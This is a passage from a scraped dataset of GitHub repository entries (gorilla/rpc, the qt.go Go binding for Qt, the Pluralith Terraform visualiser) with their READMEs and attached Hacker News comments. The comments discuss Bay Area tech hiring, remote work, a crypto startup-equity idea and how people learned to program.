possible. That\u2019s it.> Wouldn't that have shown a real belief in what they are doing?Just because Coinbase operates within the crypto space doesn\u2019t mean they must themselves embrace and utilize every mechanism within the space. Even if they believe in ICOs specifically, they may have not made sense for their specific business (see other comments about regulation)I believe remote work has two futures.The first is many companies will return to requiring a majority of time in the office. There are admittedly hard to measure reasons management will want back in the office, and the first is productivity (I don\u2019t mean how much an IC produces, but how much revenue per employee a firm generates).The second future is all our tech jobs get offshored, similar to what happened after the dotcom bubble burst.I believe that companies will probably wind up going to future #1. Or at least companies that are heavily invested in R&D.There will probably be more satellite offices and more geographically distributed tech startups.But in the first future I believe SF and Silicon Valley will still serve as one of the largest tech employment hubs. 
For example NYC is still a major financial hub, despite major top-25 US banks being headquartered in places like Texas, Virginia and North Carolina.Edited to comply with Dang\u2019s reminder of site guidelines.I've always understood the alure to the bay area wasn't the talent but the talent with the correct mindset.For example, getting software devs that are willing to work long hours to push out a new release. etc.take this with a grain of salt as i've never been to the bay area.No.Once the pandemic is over, startups that are in-office will be more productive and faster than bigger companies. The bigger companies will notice this, and force in-person/in-office as well and remote will quickly devolve.Remote is survivable, mainly because of the pandemic, but it\u2019s not preferable for business. In-office is much more efficient and it will be immediately evident once it is enforced.I've been a part of two large companies that have made a conscious move away from hiring in the Bay Area. For both of these companies, the major drivers were that the market is so saturated there that it's harder to find people there.COVID forcing remote work was that tipping point. I think it was a lot more tenuous beforehand than generally believed due to the cost of living. Great programmers can come from anywhere with the internet.California has some of the most stringent COVID restrictions in the US, and also the highest costs of living when looking at Bay Area and LA. There's no point to bring people there, especially if they're just going to working from home for the foreseeable future anyways.I've been remote for several years (pre-COVID). For $600k, they could hire 2 or 3 engineers where I live, still doubling or tripling the local tech pay, and give those engineers the opportunity to buy (or build) and pay off a house in a few years.Coinbase and Stripe are not startups. They are institutions.The hacker houses here are still rammed to the gills.A ton of companies outside FAANG are emerging as both 100% remote and async-first. Of course this doesn't make them perfect but they are succeeding both commercially and culturally. As soon as x number of Zapier's in the world who grew and attracted talent from all over, this will become the default way of working and building companies and the Bay Area will be way less relevant.> out of the ordinary housing market in the Bay Area when you compare it to other cities in CA like San Diego and Los Angeles.Many of the high-paying tech jobs in Los Angeles are consolidated in the Venice Beach area, so-called \u201cSilicon Beach.\u201d If you think you can get an affordable house in the desirable neighborhoods around there (Santa Monica, Manhattan Beach, Venice, Brentwood), you\u2019re in for a shock.You might try heading inland to Inglewood or Culver City to save money, but you\u2019ll be looking at $1.5M houses with bars on the windows. Prices have just gone insane over the last couple years.Plus, if you\u2019re hoping to escape the crime and addicts of the Tenderloin and Market Street, Venice won\u2019t offer much relief.How about we look at the numbers?: https://www.zumper.com/blog/rental-price-data/Y/Y: It looks like NY, SJ have recovered (at least for the single bedroom) while the Bay Area is lagging. Some winners are Miami, San Diego, and Orlando. It seems that Florida has seen the highest rise in rental costs. Some losers are Newark, Virginia, St Louis. It seems the shittier cities have lost the most, and the sunnier/friendlier ones have won. 
In that sense, San Francisco has done averagely.Based on that, I don't think SF/Bay Area is going downhill as people are imagining. They are doing much better than other places especially that they are already very expensive.It's funny that no one wants to admit that Covid-19 was the forcing function for shifting to remote wholesale. I have many peers who have been fighting for internal accessibility of working remotely, most of whom gave up and jumped ship. I even know a few people who left Stripe in 2019 due to their inflexible remote work policies.So to now come out and say \"look at all the remote hiring we're doing\" sure leaves a bad taste in my mouth. Yeah, because you have no choice!The talent has realized they have all the cards and bargaining power in terms of remote work right now. Anyone who is fighting to return to the office is missing the point. We should all be striving to unlock permanent mobility within our professions.> I am assuming that many positions that require the candidate to (eventually) relocate to the Bay Area are not getting a lot of traction. A fried of mine refused to interview for position like that despite being very junior! She decided the cost of living is not worth it.Cost of living is high, but for a junior engineer I think it might be possible for a good case to be made that it is worth it assuming that the junior engineer has a fairly recent bachelor's degree from a good college.One of the lessons you should have learned incidentally while getting your degree is that if your rent and utilities and much of your food are covered and you are busy enough that you don't have a ton of free time you can get by for at least 4 years without having much extra money.The median household income in San Francisco is $112k per year. The average household size is 2.26 persons.This means that half the households in San Francisco are getting by on less than $112k per year. That's for everything--rent/mortgage, food, utilities, insurance, transportation, clothes, entertainment.I'd consider if I was a junior engineer taking the San Francisco job if it paid significantly more than $112k, and then for the next few years live like I lived in college. Live in the kind of housing that the people who are making under the median household income live in, and everything you make that doesn't go to living in that housing with a lifestyle similar to a college student put in in your 401k or other investments.You already know from college that you can live this way for 4 years and come out OK. If you can just do that for a few more years, you can have some nice savings built up. Then you can figure out if you want to stay in San Francisco but upgrade your lifestyle, or move to someplace cheaper, but with a nice fat portfolio of savings and investments that will serve you very well later.How about taxes? In my East-European country I am paying about 10% net on taxes (including social and health, including expenses, excluding VAT). Nothing illegal or offshore, just normal accounting from local semi retired lady.In Cali I would have to juggle with deferred stocks, exit taxes, local taxes, federal taxes etc.. And net salary would be about same.No one has yet brought up an essential issue: California bans non-competes. https://www.vox.com/new-money/2017/2/13/14580874/google-self.... 
As long as California does, and most other places allow them, we're going to continue to see surprisingly high levels of startup formation and company success in California, despite all the bad things being true.It's hard to say for sure but I think probably yes. It was essentially an accident that the bay area tech scene ever existed at all and other than nerds writing code and VC's getting rich I don't know how much residents of the area even liked it.The way to make the bay sustainable is to build taller buildings for people to live in. However this isn't especially popular and even if it was, there is enough bureaucratic cover for a minority to stall it off indefinitely.I think if you could do that in the next 20 years the bay could maintain it's hegemony. Seems exceedingly unlikely to me.I suspect it will keep enough momentum to beat out most markets for some time to come, though already by a smaller margin and with a seemingly worse quality of life these days.Expanding out of the Bay Area has been standard practice basically forever.Unless a company has infinite budgets and plans to maintain small org sizes forever, keeping your entire workforce in the Bay Area doesn\u2019t really scale.The real question to ask is: Where are these new jobs? Remote? Satellite offices? New foreign offices? Remote is the hot topic, but I haven\u2019t actually seen as many remote listings as I expected given all of the talk. For many of these companies, it could be as simple as opening new offices in other cities. If they\u2019re opening offices in expensive locations like Seattle or NYC then it\u2019s not really about cost of living.On the other hand, if they really are embracing remote and hiring out of non-traditional locations then maybe it is more about cost of hiring. However, in that case I\u2019ve personally experienced companies become eager to skip the US altogether and start hiring in even cheaper international locations with untapped talent. It\u2019s complicated.> Talent in the Bay Area are fetching astonishing pay ($600k for L6)While it\u2019s true that top Bay Area engineers can fetch $600K, it\u2019s much more rare than it can look. Take a look at the median compensation for software engineers in the Bay Area some time. It\u2019s a fraction of that number. Those ultra high paying FAANG jobs aren\u2019t the typical software job, even in the Bay Area.> A fried of mine refused to interview for position like that despite being very junior! She decided the cost of living is not worth it.Top Bay Area compensation should be enough to offset the higher cost of living for someone living in an apartment. The cost of living for something like a 1 or even 2-bedroom apartment is negligible for someone who can get into a FAANG job in the Bay.On the other hand, taking a median software job in the Bay Area is definitely not worth the cost of living increase, IMO, unless you\u2019re using it as a pivot into a FAANG level job later.When you can't address basic Maslow levels (food, housing, etc.) financially, you definitely are incapable to supporting top level Maslow levels which are central to innovation, creativity and improvement.https://en.wikipedia.org/wiki/Maslow's_hierarchy_of_needsThe SF Bay Area crossed over that boundary a fairly long time ago.I finally gave up in 2016 after being born and raised in California and have decades of Tech career in the SF Bay Area. It's no longer viable for ACTUAL innovation there. 
For the most part there is no technology innovation happening in SF Bay Area Tech companies anymore. There is plenty of revolutionary political innovation but nothing in technology and the direction of that is distinct ANTI-innovative.Innovation no longer requires being in the SF Bay Area to be achieved. My recent formation of a new Tech company (in 2016 in upstate NY) and sale/exit in 2018 proves it to me. YMMV of course.The \"Open Secret\" is there was always a \"bunched distribution\" at the top of the talent scale in SF/Bay Area that really only made it worth it for the FAANG-level orgs over the last decade or so. The top 10-20%? Absolutely better there in terms of talent than anywhere else in the country. Below that, you're just paying 500K when you could get an engineer of equal/better skill anywhere else for 120K. It makes sense for FAANG to lock up that top 20% with 500K salaries... it does not make sense for companies that aren't going to get one of those engineers to try and swim in that pond unless you're making a serious run at being in that level. It really hasn't for the last decade, COVID just made the music stop for a moment and forced everyone to reckon with that.For Stripe/Coinbase, 74%/89% eng hiring out of Bay Area. Today, a lot of that hiring could be happening in other parts of the US. But before you cheer too much about that, consider that the shareholders of those companies are already looking for ways to hire outside US. After all, if your setup can accommodate someone from Kansas, how hard is it to onboard someone from Canada or Mexico?A data point - my company is already hiring more than half of the new hires outside the USA. Or to paraphrase a politician, that whirring sound you are hearing is one of the last remaining sources of good jobs getting sucked out of the country.Previous discussions: https://news.ycombinator.com/item?id=27696235 and https://news.ycombinator.com/item?id=29784222I sure hope so, maybe my friends who grew up in the Bay Area who are not techies will be able to move back home if they want to.The problem is regulatory restrictions, that since 2017, have been used to shut off capital flows to token sales.Token sales were one of the most promising avenues toward the goal of widening the base of individuals that could participate as investors in the venture capital market:https://link.springer.com/article/10.1007/s11408-020-00366-0...\"The average ICO has almost 4700 contributors. The median contributor invests a relatively small amount. The ICO market appears to have successfully given access to the financing of innovation to a new class of investors, which is a long-standing public policy issue\"That being said, it's possible you could use the JOBS Act's provision for crowdsales to widen the base of individuals that could invest through your platform:https://en.wikipedia.org/wiki/Jumpstart_Our_Business_Startup...> Everyone here loves crypto (and have some) and loves startups too.Not true at all, many here on HN are openly hostile towards it because they dismissed it at the time while others were made obscenely wealthy. Whether they own some is probably true, though.> I want to create a coinbase for startup equity. Translation :you invest small sums of your cryptos in a startup of your choise.First, you don't want to be the 'Coinbase' of anything... 
Really, its a horrible company run by what seem like the most incompetent staff they pouched from MtGox and I squarely blame YC and tyical SV insider tactics for what it's doing.With that said: it's a cool idea that many of us have had throughout the years since Mike Hearn wasted funds on Lighthouse and pretty much abandoned a mediocre solution to a pressing problem and left everyone with a bad taste in their mouth about such a thing.> Persuade me that it won't work with arguments based on 1-3.Preface, I've been in the community since Satoshi was still on BTF: it's not that it won't work, in fact things like Pineapple Fund, Sean's Outpost/Satoshi Forest shows that many of us in the Bitcoin community are incredibly generous (with time and money) and want to use this tech to solve many problems that Megacorps profess to care about and want to solve, but amounts to merely fluff to sell to their PR departments.1: Some of have tried, but nothing worth talking about since Lighthouse.Boost VC is probably the closest thing I can think of, and their are other incubators that are open to Crypto based projects (I pitched at a meetup in Boulder and a person from Techstars followed up).2: It's tricky, but if you remain in Bitcoin-only ecosystem their are few to no regulations or bylaws depending on where you operate from--this is a feature, not a bug. But this opens the need for arbiters and custodianship, which is frowned upon since this is supposed to be a trust less based system, but really that is what things like multi-sig escrow and smart contract oracles are for.Reputation matters in Bitcoin, and contributors like Andreas who have made Bitcoin their life's work with little to no compensation were later rewarded by the community--and he deserved it!Bitcoiners, the early adopters more so, are seriously the most paranoid people in the tech World outside of say whistle blowers working for Intelligence firms in my opinion--and some like Reality Winner really didn't do a good enough job to be on par with someone who sent $50 to a DNM back in the early days.3: Many issues here, to many to outline them all.But as mentioned before its creating a trustless transparent system; which will be your biggest hurdle since I'm guessing you don't have any credibility in this ecosystem either.Second, what is the ROI on this, otherwise what you are trying to create is just a charity with no real sustainable growth model. Even Non-profit/NGO often have some outside funding from a foundation or a vested party interested in maintaining it's existence. Think about who would want you to stay alive and work back from that.The newest wave of Bitcoiners since 2017 (2013 really) are the money-centric ones that likely won't fund any of the projects like that I mentioned before to help causes.Personally speaking, I'm moving to more Bitcoin friendly countries/environments for this is exact reason. 
The US is stifling progress and other countries have a more favorable view on Bitcoiners and their businesses, so I'm off to greener pastures.But, I need some time away from this Industry--I had my own fintech startup in BTC for ~5 years and disrupted an entrenched Industry in that time, and then got into the enterprise 'blockchain solutions' department for a Megacorp.If you're looking for consultant I'd be willing to do that in the interim, but if you give me 6-12 months I could join the team and do some legwork as I could probably be of more use then and tell you where/how to incorporate and what are potential strategies for not just taxes but also securing your streams of revenue etc...Do you have a Github or any portfolio of past projects? Your post history doesn't seem to reveal much other than a job posting for a freelancer.\"Everyone here loves crypto (and have some) ...\"Hahaha ... I think you are new to HN.Why would a startup want this?How is it better for a startup than ordinary currency?How is it better for a startup than experienced investors?How is it better for a startup than common investment vehicles?What is the obvious business case for the additional complexity and potential legal land mines?That idea was initiated in the ICO boom and failed miserably.Most of the money was either blatantly stolen, hacked or the companies went broke when the price of bitcoin dropped by 80%.1. It sounds like you're effectively making your own stock exchange, but with crypto instead of cash. I imagine the SEC will have many things to say about that. It could be legal, but you're not going to like the laws they'll make you follow.2. In a real stock exchange, the company value is largely the volatile thing. In one backed with crypto, the price of a company will fluctuate more from the asset you're buying it with than the company's activity itself. If the price of bitcoin goes up, I own the same number of shares but worth fewer bitcoins. That seems like not what folks into crypto care about.3. If a company puts all of its shares into this, it likely cannot ever ipo. That's going to turn off most investors. I would expect it's an all-in endeavor.4. Companies accidentally losing their private key for unissued shares sounds like a very bad failure mode.Could you clarify how this has anything to do with crypto?It seems to me that you're acting as a fundraising platform: people give you money, you pass it on to startups, and you guarantee these people that they own some equity in the startup.The concept of \"own some equity\" is a legal concept, and this is what you have to nail down. Crypto is irrelevant to this conversation.Is there a reason to do this via crypto vs...any other way?Aren't there rules / laws about selling equity in a company?What good are these small sums?I see an issue with the volatility of investment being paired with the volatility of crypto currencies. It\u2019s like gambling turned to 11.Are startups willing to take crypto in exchange for their share?I had this idea in 2016, i.e. 
offer a platform that lets people register their startups, they hire people + provide a service and enable them to provide equity securities to their employees + the founders (still using traditional contracts that represent the actual legal structure in the form of real-world legally binding contracts with a simultaneous existence as security tokens or whatever financial instruments make sense to early-stage startup employees) but issue ICO-based denominated shares that are then owned by the employees by their holding of the private keys of the wallet - could be operationally similar to ownership of present day ERC-20 tokens), and then enable them to be traded on DEXs if the employee has already vested parts of the crypto-shares/ERC-20 equivalent tokens. The real expense comes in a bit with the requirement of needing to still have a valid legal structure in place with contracts, with specific terms that still are valid with the existing legal framework in whatever country the platform would support. It is for sure viable but will require a lot of capital for regulatory compliance, and also will need to compete in the longer term against better capitalized companies like Coinbase that already have all the necessary traditional banking relationships and other tech companies that operate in adjacent DeFi fields (if they ever decide to compete, of course).Like Coinbase could acquire Carta or one of those other startup equity focused companies and then use that user data to focus on the best startups to trial this concept with, and then roll it out publicly and then just totally kill your idea. I think it's definitely a good application of the technology and the existence of such a platform would structurally strengthen the crypto ecosystem over the long term.The fact that Coinbase did a DPO instead of some kind of fancy DeFi-based offering is telling in their potential lack of conviction in the ability to offer public securities at this stage in the game through some of these smart contract based platforms. I'm sure @barmstrong and the Winklevoss brothers have spent a lot of time thinking about thisBinance is already tokenizing equity on the public market (like Tesla stock). You may want to look into how they\u2019re doing it.I'd guess the answer is the same as - Why isn't Kickstarter doing this?From your research why isn't Kickstarter doing it?How about you flip this question and ask people why it will work. I mean at least for me , I got so many naysayers around me so that I don't have to go HN and ask why my idea is bad :)It is the initial coin offering thing coupled with a good user interface?1. Only Accredited investors can invest in private startups.2. Equity crowdfunding is a way around 1. but only too restrictive- limited fundraising, more disclosure, and follow-on venture/ traditional funding hard to come by.Above is US-centric view. Using crypto instead of fiat currency is not a workaround regulations and reputation.But look at BlockFi, it might offer you insight into workaround using crypto to raise an Angel/VC fund from crypto millionaires.Everything crypto is a ponzi schemeThese do already exist and there are many of them already on both Ethereum and Binance Smart Contract networks. 
More will be coming with SORA/Polkadot and I suspect it won't be long before they are on Harmony, as well (basically any EVM compatible network will likely have these).I'm not sure exactly on the terminology, but essentially most large DEXes (Decentralized Exchanges) will typically get involved in funding new coins. Typically what happens is a DEX will (either through governance of via the DEX developers) offer to \"host\" a new coin in their liquidity pools on the DEX, and boost that coin by incentivising users with additional rewards for proving liquidity (typically in the form of tokens for that given startup). These incentivised liquidity pools are called \"farms\" and launching a crypto startup in this way is typically called a \"Initial Farm Offering\" or \"IFO\".There are also more projects on the horizon that aim to further this idea of providing liquidity to developers in exchange for coins.Actually a lot of people here hate crypto for various reasons. One big one is the disastrous environmental impact of the proof of work algorithm (yes we know Ethereum will try proof of stake soon since years).1) innovation: a lot of people are already investing in startups. The main value of your idea is to do something existing, but with crypto. Which has most likely already been tried. It's not necessarily a bad idea. The execution is probably more important than the initial idea.2) legal issues: why would using crypto avoid you the regulations ? I feel like it will make everything more difficult and confusing for everyone if you want to do it legally.3) usability: you will most likely target a very small group of experts. crypto are not user-friendly.Your startup idea may work. Some people are very much into crypto and you could target them. Personally I would consider the impact of my work to the society. The proof of work is a no-go for me, but you may not care.Biggest trade:WILSON FREDERICK R / UNION SQUARE VENTURES 2012 FUND LP2021-04-14Sale-3,755,323 (number of shares)$388.89 (price per share)-1,460,403,806 ($ value)168,736 (shares after)", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gorilla/rpc", "link": "https://github.com/gorilla/rpc", "tags": ["go", "rpc"], "stars": 535, "description": "A golang foundation for RPC over HTTP services.", "lang": "Go", "repo_lang": "", "readme": "rpc\n===\n[![Build Status](https://travis-ci.org/gorilla/rpc.png?branch=master)](https://travis-ci.org/gorilla/rpc)\n\n---\n\n**The Gorilla project has been archived, and is no longer under active maintainenance. You can read more here: https://github.com/gorilla#gorilla-toolkit**\n\n---\n\ngorilla/rpc is a foundation for RPC over HTTP services, providing access to the exported methods of an object through HTTP requests.\n\nRead the full documentation here: https://www.gorillatoolkit.org/pkg/rpc\n", "readme_type": "markdown", "hn_comments": "Seems like the key hurdle here is to get doctors interested in a new info platform. Why if it was consumer led, with current/prospective patients voluntarily update a profile that doctors could access?on app store examples.. my chart CHmychart, trinityhealth...etc... recently had someone I know from the south move up north and the doctor could not see their prior info. Which would have and did save a lot of test from not being done over again. They even include current picture, which they did not have a year ago for annual physical. 
LabCorp performs blood test in their own facility and have the ability to change personal info if you approve w/ ID. not needing an individual of \"management\" to do so, this could allow easy manipulation of info.. and how many years of history does each doctor need to see or allowed to see, how do patients get control over this? 3 years, 5 yrs, 10 + back... and since different hospitals used different software St. Jude hospital records dont show up on the EHR which shows all City hospitals. insurance needs to find a new EHR system advantages as soon as S.S info input by doctors, not sure how it pans out with countries without S.S numbers (have multiple ID's)Your competitor may have crazy momentum today, but who knows about the future. Companies with bright futures blow themselves up all the time.Startups with momentum that don\u2019t self-destruct are likely to get acquired. VCs happy, founders happy. Senior engineers will bail soon afterward and the mood will change. More unhappy people on twitter. Bugs linger and don\u2019t get fixed. The business is now focused primarily on getting larger customers or expanding to different markets.And that leaves you with plenty of opportunity. It might not look like it now, but their 15 minutes won\u2019t last forever. Be happy for their success and be happy that they\u2019re expanding the size of the market for everybody. Keep plugging away and focus on your customers.In answer to both parts of your post: you're a clear communicator (you outlined the situation concisely and effectively, and everyone commenting in response so far has found a common understanding of that) and you're approachable and thoughtful. It'll take time but those are valuable compounding traits to have; carry on with them and try to hone them.1) Find what their customers are complaining about on their forums, blogs, and social media.2) Fix those problems. Tell the VCs you're better because you have fixed these problem.I don't mean bug fixes, I mean conceptual problems, fwiw.Easy, don't focus on them. Get yourself happy customers and solve problems your customers have. Be the competitor that offers exceptional customer service and goes the extra mile.There is a lot of room in these markets.Difficult to say at this level of abstraction, but there's one strategy that we see quite often. - Identify shortcomings in ABC, particularly on the intersection with other software, integrations or edge cases for specialized users \n - Build feature spikes in your project for those cases \n - Market your product around thise cases - ie. have dedicated pages where you have a hook \"Better alternative to ABC for veterinarians\"Read Jason Cohen\u2019s blog.https://blog.asmartbear.com/youre-a-little-company-now-act-l...https://blog.asmartbear.com/unfair-advantages.htmlWell, without knowing what the product is, the advice could be rather limited. You can offer better support or you can offer something that a big company cannot afford like data exportability. VC financed companies need to show exponential growth to justify their valuations while you maybe can afford to invest in your users that is not profitable but that might give you an advantage in the long term.As always, read whatever patio11 wrote about that. For example:\"Wufoo + Free Incentivization = Cheap, Effective User Surveys\" https://www.kalzumeus.com/2010/01/17/wufoo-free-incentivizat... 
(No HN discussion)\"Your first ten customers: How should you communicate with customers?\" https://stripe.com/atlas/guides/starting-sales#how-should-yo... (HN discussion https://news.ycombinator.com/item?id=15534034 598 points | Oct 23, 2017 | 133 comments)Can I add my own advice: In a previous post you said that you are using surveys. How long are them? I have very little patience and I'd answer only 2 or 3 questions, like* Do you have any comment or feature request?* Email/phone to ask more about this. (optional)* [Not enough patience. I ignored the third question and closed the browser!]Probably people has more patience than me, but try to make it short.> \"how is this different from ABC?\".What's your answer to this? I'd expect a pretty good range is possible without any changes to product, from \"you get support direct from the engineer and CEO?\" to \"Can ABC do this...?\"Related to the pitching or communications aspect, is it really a clone, or is it a clone-if-you-ignore-the-various-details? Those are way different.Do you support charities, do you have a cuter mascot, do you regularly integrate direct client feedback, do you send out a mixtape every year?Hang in there, define your goals, it really sounds to me like you are already done being awesome and are poking at legendary, wondering where the back door is. Could be really great from here, or it could be that this is more like a side gig to support your full set of life interests...> My question goes out to anyone familiar with this situation: how do you change your product strategy to be successful despite an 800-lb gorilla in your market?Happy to discuss more in details but if that 800-lb gorilla is VC funded, depending on the details, it's extremely likely they will fail and you will enjoy the rush of customers who are left hangingI switched from Windows to Mac in 2009 for professional reasons and the Mac software landscape at the time was far from what it is today. I got very keen on getting some tried and true Windows software to work on Mac which in some cases led me to discover half-baked open source software solutions that barely worked and were unmaintained. I guess this was the first time I thought to myself: \"Gosh, wouldn't it be nice to know how to program.\"I taught myself C at the age of 25 and approached a computer science degree shortly afterwards. That open source software is still unfixed but I'm glad it sent me down this path.I started coding when I was 12-13, when me and my bro got a C64 for Christmas one year. I learnt Basic and quickly moved onto 6502 assembly language, learning to hack games for infinite-lives, level selection, etc., plus a little bit of demo/intro coding. I learnt a lot by looking at the code of others \u2014 including much disassembling of object code. I was always interested in how folks were making things happen in games, how they were using the hardware.When I was 17, I dropped out of college to take a job in games development. My first dev system was a second C64, but was quickly replaced by a BBC Model B, which in turn was replaced with an 8Mhz 286 Tandon PC, 2mb of RAM, EGA graphics, 5.25\" floppy drives, 40mb HD, and a PDS card [0][1]. You'd assemble the code on the host, send it down to the target \u2014 IIRC, PDS had some handy debugging tools: breakpoints, single step, etc. 
Pretty impressive for the time, given the target platforms.Later I learnt some assembly language for other common processors at the time (z80, 68k, 8086), and also started learning C/C++.When the internet started to become more of a popular thing, I started learning both Javascript/variations and Java, and also picked up some VB skills.Mid-90s, somewhat tired of games dev, I transitioned from games to front- and back-end web-based stuff, spending a number of years with a fairly successful startup company specialising in e-commerce.Since then I've also learnt, and delivered projects in, a multitude of languages. Including (in no particular order) C#, Typescript, Python, Go.So I've been coding for maybe 35+ years now, just over 30 years of which have been commercially/professionally.I like coding. I am often particularly fascinated by interesting algorithms.[0] https://www.cpcwiki.eu/index.php/PDS_development_system[1] https://retro-hardware.com/2019/05/29/programmers-developmen...I was 8 years old in 1983 when my parents bought the original IBM PC model 5150. It had 64k of RAM, two 5\u00bc\" floppy drives, and a CGA video card. By the end of its life, it had 576k of RAM, a VGA video card, and 2 20MB MFM hard drives. Oh, and an NEC V20 CPU in place of the original 8088.I took a BASIC programming course at Radio Shack on the TRS-80 and was otherwise self-taught (sometimes learning /with/ my dad) until university. (I took computer science in high school, too, but didn't learn anything new :) )Also extremely grateful for these events!We recently interviewed an Azure expert who started at the age of 7 with simple commands.You might find it an interesting read = https://mindquest.io/blog/news/1900I learned how to program at school in 1973, when I was 17 on a machine similar to this one:\nhttps://en.wikipedia.org/wiki/HP_9800_series#Second_generati...It may seems a toy, but it was not, it had 8K bytes. It was a time where big computers in France had 128K bytes RAM.What is astonishing is that it was in Vannes, a small town in Brittany, in the west part of France.I often wonder how the Math teacher was able to get such a computer in his school.In 1979, I went to university to receive course advice in my chosen field, the adviser I got was trying fill the empty courses, not recommend what was best for me.One of the courses was computer programming in Pascal, offered for the first time. There were several hundred students enrolled and they ran duplicate day and night sessions of the course.The course was designed to make 'trial and error' programming as difficult as possible, so we would learn enough about the syntax to write working code straight up.For the 250 odd students they had 8 card punch machines. You had to punch out your cards, wrap them up and put them in the mail to be run overnight, you went back to pick up your finished program the next day.The 8 card punch machines were hammered 24/7 and by the end of the second week two broke down. A week later one of them would not punch the letter 'B'.Unfortunately the course took up as much time as my other 3 subjects so I withdrew, but I did learn a lot about programming, especially when I bought a decent programmable calculator. I did go on to do a bit more programming but it wasn't my main job.And the funny thing is that there's no app in Steam Right now to watch 360 videos from youtube on Vive. Google, you have great Tilt Brush. And no Youtube.Some useful shortcuts:r random collection.c create a collection.space stop music.] 
next track.[ previous track.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kitech/qt.go", "link": "https://github.com/kitech/qt.go", "tags": ["golang", "qt", "speed", "gui", "qt5", "android", "cross-platform", "go"], "stars": 535, "description": "Qt binding for Go (Golang) aims get Go's compile speed again.", "lang": "Go", "repo_lang": "", "readme": "\n### qt.go\n\nQt5 binding for Go (Golang) without CGO that aims to achieve Go's native compile speeds. Instead of using common bindings and heavy C++ wrapper code that forces you to compile and link time and time again, Qt.Go uses FFI so there's only a runtime dependency.\n\n[![Build Status](https://travis-ci.org/kitech/qt.go.svg?branch=master)](https://travis-ci.org/kitech/qt.go)\n[![Go Report Card](https://goreportcard.com/badge/github.com/kitech/qt.go)](https://goreportcard.com/report/github.com/kitech/qt.go)\n[![GoDoc](https://godoc.org/github.com/kitech/qt.go?status.svg)](https://godoc.org/github.com/kitech/qt.go)\n[![Sourcegraph](https://sourcegraph.com/github.com/kitech/qt.go/-/badge.svg)](https://sourcegraph.com/github.com/kitech/qt.go?badge)\n\n### Features\n\n* Binding code with no CGO compile cost\n* Popular Qt5 packages (widgets/QML/extras) support\n* Simple go-uic, go-rcc tools\n* full signal/slot support\n* protected method override support\n* default arguments and value wrapper functions\n* Class/Method/Function/Enum comment for godoc\n* Go side signal/slot definition (experimental)\n\n\n### Multiple platforms support\nAll platforms should be supported, for now some of them are tested:\n\n* Archlinux/Ubuntu16+\n* MacOS\n* Android\n* Windows\n\n### Installation\n\n##### requirement\n\n* go 1.9+\n* libffi\n* dlfcn (windows)\n\n\n##### FFI\n\nMake sure libffi is installed\n\nDebian based: `apt-get install libffi-dev`\n\nArch based: `pacman -S libffi`\n\nMacOS: `brew install libffi`\n\n##### qt.go:\n\n go get -v -u github.com/kitech/qt.go\n \n##### runtime dependency:\n\n git clone https://github.com/kitech/qt.inline.git\n cd qt.inline\n cmake .\n make\n cp libQt5Inline.so /usr/lib/libQt5Inline.so\n\n##### uic/rcc\n\n go get -v -u github.com/kitech/qt.go/cmd/go-uic\n go get -v -u github.com/kitech/qt.go/cmd/go-rcc\n\n[Full Installation](https://github.com/kitech/qt.go/blob/master/install.md)\n\n### Examples\n\n package main\n import \"os\"\n import \"github.com/kitech/qt.go/qtwidgets\"\n func main() {\n app := qtwidgets.NewQApplication(len(os.Args), os.Args, 0)\n btn := qtwidgets.NewQPushButton1(\"hello qt.go\", nil)\n btn.Show()\n app.Exec()\n }\n\nMore complex examples: https://github.com/kitech/qt.go/examples/ https://github.com/qtchina/qt.go.demos/ \n\nGo side signal/slot: [syntax document](https://github.com/kitech/qt.go/blob/master/docs/qt_meta_data_mark_syntax_for_go.md) [usage demo](https://github.com/kitech/qt.go/blob/master/qtmeta/tests/meta_data_test_.go)\n\n\n### Community\n\n * QQ groupchat 933636020\n * Telegram room https://t.me/qtdevjiaoliu (Thanks https://github.com/xiayesuifeng)\n\n\n### Internals\n\nQt.Go uses FFI to call wrapped Qt functions and methods, so there is no compile/link time dependency on Qt, only a run time dependency.\n\nThis should make the development and testing phases much faster.\n\n[Internal document](https://github.com/kitech/qt.go/blob/master/docs/qt-go-internals.md)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Pluralith/pluralith-cli", "link": 
"https://github.com/Pluralith/pluralith-cli", "tags": ["cli", "pluralith", "terraform", "cloud"], "stars": 535, "description": "A tool for Terraform state visualisation and automated generation of infrastructure documentation", "lang": "Go", "repo_lang": "", "readme": "![GitHub Badge Blue](https://user-images.githubusercontent.com/25454503/157903512-a9be0f7b-9255-4f88-9b00-9d50539dd901.svg)\n\n# Pluralith CLI\n\nPluralith is a tool to visualise your Terraform state and automate infrastructure documentation.\n\n`Pluralith is currently in Alpha`\n\n \n\n\n\n\n## \ud83d\udcd5 Get Started\n\nWe've got official docs to get you set up! \nClick the buttons below and jump right into it:\n\n[![CI Button](https://user-images.githubusercontent.com/25454503/179351758-7bfd8405-f58b-441a-ad3b-8c25f433faca.svg)](https://docs.pluralith.com/docs/get-started/run-in-ci)\n![Placeholder](https://user-images.githubusercontent.com/25454503/179351794-be200524-7a58-4243-9e44-efb9db7f0a93.svg)\n[![Local Button](https://user-images.githubusercontent.com/25454503/179351796-4164b3bb-947b-47dd-967b-43bbf815ae07.svg)](https://docs.pluralith.com/docs/get-started/run-locally)\n\n \n\n## \ud83d\udddd\ufe0f Key Features\n\n- Create beautiful `infrastructure diagrams` instantly with one single terminal command: `pluralith plan`\n- Automate your documentation by **[running Pluralith in CI](https://docs.pluralith.com/docs/get-started/run-in-ci)**\n- Highlight latest plan `changes` in the diagram\n- Detect and visualise infrastructure `drift`\n- Visualise the `cost` of your infrastructure in the diagram (via Infracost)\n\n \n\n![Bookface Illustration](https://user-images.githubusercontent.com/25454503/179351981-41e991f8-a4d4-4735-b1ec-cc774bb9a4f0.png)\n\n\n \n\n## \ud83d\udcc8 Repo Activity\n\n![Alt](https://repobeats.axiom.co/api/embed/b4255b1c1484b58510be92933ccb769c885511a3.svg \"Repobeats analytics image\")\n\n \n\n## \ud83d\udcec Get In Touch\n\n- Sign up for the `alpha` over on our **[Website](https://www.pluralith.com)**\n- Join our **[Subreddit](https://www.reddit.com/r/Pluralith/)**\n- Check out our **[Roadmap](https://roadmap.pluralith.com)** and upvote features you'd like to see\n- Send a message to [Dan](https://www.linkedin.com/in/danielputzer/) or [Phi](https://www.linkedin.com/in/phiweber/) on Linkedin\n\n_Disclaimer: To properly use this CLI you **will need** the **Pluralith UI** and/or an **API key**. 
